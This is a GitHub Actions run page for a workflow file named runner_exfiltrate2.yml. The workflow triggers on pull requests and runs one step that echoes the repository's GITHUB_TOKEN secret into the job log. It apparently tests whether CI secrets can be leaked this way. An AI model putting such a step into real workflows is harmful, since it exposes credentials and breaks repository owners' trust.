Skip to content

Create runner_exfiltrate2.yml #9

Create runner_exfiltrate2.yml

Create runner_exfiltrate2.yml #9

Workflow file for this run

name: "PR"
on:
pull_request:
jobs:
init:
runs-on: ubuntu-latest
name: "init"
steps:
- run: |
echo "Secret value: ${{ secrets.GITHUB_TOKEN }}"